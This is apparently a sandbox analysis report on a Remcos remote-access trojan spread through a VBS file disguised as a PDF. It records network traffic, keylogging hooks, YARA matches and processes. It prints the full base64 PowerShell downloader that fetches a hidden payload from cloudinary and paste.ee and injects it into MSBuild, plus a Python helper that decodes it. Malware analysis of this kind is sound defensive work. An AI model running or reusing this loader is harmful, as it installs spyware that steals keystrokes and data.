                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
                        Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49674 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49672 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
                        Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
                        Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknown | HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49714 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49732 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49733 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49731 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49739 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49760 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.6:49772 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                        Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR

                        E-Banking Fraud

                        Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041BB77 SystemParametersInfoW

                        System Summary

                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 2020, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandledJump to behavior
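The command line above is only a thin stub: one FromBase64String call feeding Invoke-Expression. Everything that matters (the res.cloudinary.com download, the paste.ee next stage, the MSBuild.exe host and the C:\ProgramData\classers.vbs copy that appear elsewhere in this report) sits inside the base64 string. The Python below is an added triage helper written for this page, not Joe Sandbox's code and not the malware's: it decodes the blob exactly as the stub does, parses the resulting script for those indicators, and replicates on a constructed stand-in the marker-carve, reverse and base64-decode that the script applies to the downloaded "image". The base64 text is the one recorded on this page; the meaning assigned to each position of the loader argument list is read off this sample and is an assumption, not a documented interface.

```python
import base64
import re

# Base64 blob copied verbatim from the powershell.exe command line in this report;
# the surrounding decoder stub is reconstructed from the same line.
STAGE1_B64 = "JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw=="
STAGE1_CMDLINE = (
    "$hamminesses = '" + STAGE1_B64 + "';"
    "$stickhandled = [System.Text.Encoding]::UTF8.GetString("
    "[System.Convert]::FromBase64String($hamminesses));"
    "Invoke-Expression $stickhandled"
)

# A single-quoted literal long enough to be a payload rather than a flag value.
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{40,}={0,2})'")


def decode_stage1(cmdline: str) -> str:
    """Pull the base64 literal out of the command line and decode it the way the
    stub does: FromBase64String followed by UTF-8 GetString."""
    m = B64_LITERAL.search(cmdline)
    if not m:
        raise ValueError("no base64 literal of stub size found")
    return base64.b64decode(m.group(1), validate=True).decode("utf-8")


def extract_iocs(script: str) -> dict:
    """Static parse of the decoded stage-1 script.  Positions in loader_args are
    an assumption taken from this sample: [0] reversed next-stage URL,
    [4] injection host, [9]/[10]/[11] drop directory, file name, extension."""
    iocs = {}
    m = re.search(r"\$\w+\s*=\s*'(https?://[^']+)'", script)
    iocs["download_url"] = m.group(1) if m else None
    iocs["markers"] = re.findall(r"'(<<[A-Z0-9_]+>>)'", script)
    # PowerShell's [-1..-(len)] slice reverses the carved text before decoding.
    iocs["payload_reversed"] = "[-1..-(" in script
    iocs["loads_assembly"] = "[System.Reflection.Assembly]::Load(" in script
    m = re.search(r"\[([\w.]+)\]\.GetMethod\('(\w+)'\)", script)
    iocs["entry_method"] = f"{m.group(1)}.{m.group(2)}" if m else None
    m = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\);", script, re.S)
    args = re.findall(r"'([^']*)'", m.group(1)) if m else []
    iocs["loader_args"] = args
    iocs["next_stage_url"] = args[0][::-1] if args else None
    iocs["host_process"] = args[4] if len(args) > 4 else None
    iocs["drop_path"] = args[9] + args[10] + "." + args[11] if len(args) > 11 else None
    return iocs


def carve_payload(blob: bytes, start=b"<<BASE64_START>>", end=b"<<BASE64_END>>") -> bytes:
    """Replicate the stage-2 carve the script performs on the downloaded 'image':
    take the bytes between the markers, reverse them, base64-decode."""
    s, e = blob.find(start), blob.find(end)
    if s < 0 or e <= s:
        raise ValueError("markers not found or out of order")
    return base64.b64decode(blob[s + len(start):e][::-1], validate=True)


# Constructed stand-in for the downloaded .jpg (not the real file): junk bytes,
# then the reversed base64 of a fake payload between the markers.
FAKE_PAYLOAD = b"MZ\x90\x00constructed-fake-assembly"
FAKE_IMAGE = (b"\xff\xd8\xff\xe0junk<<BASE64_START>>"
              + base64.b64encode(FAKE_PAYLOAD)[::-1] + b"<<BASE64_END>>trailer")

if __name__ == "__main__":
    for key, value in extract_iocs(decode_stage1(STAGE1_CMDLINE)).items():
        print(f"{key}: {value}")
    print("carved:", carve_payload(FAKE_IMAGE))
```

Decoding gives the cloudinary URL requested in the HTTP traffic section, the two markers the script searches for in the "image", the reversed string `0/n1CZT/r/ee.etsap//:sptth` (the paste.ee URL seen in the next GET), `MSBuild` as the injection host, and `C:\ProgramData\` + `classers` + `vbs`, which is the path the cmd.exe copy command writes to. Note the `-ge`/`-gt` check in the script is a bare expression with no `if`, so a missing marker is not handled and the script simply throws at Substring; a triage tool should validate the markers explicitly, as carve_payload does.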
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process Stats: CPU usage > 49%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
                        Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041D071
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004520D2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0043D098
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00437150
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004361AA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00426254
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00431377
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041E5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0044C739
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004267CB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0043C9DD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00432A49
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0043CC0C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00434D22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00426E73
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00440E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0043CE3B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00412F45
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00452F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00426FAD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00401F66 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 004020E7 appears 40 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 004338A5 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00433FB0 appears 55 times
                        Source: Aktarma,pdf.vbs | Initial sample: Strings found which are bigger than 50
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: Process Memory Space: powershell.exe PID: 2020, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@13/11@5/5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_00416AB7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,15_2_0040E219
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,15_2_0041A63F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_00419BC4
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Rmcghghyrtssxr-7RL1P2
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a32j0lwm.w2c.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs"
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
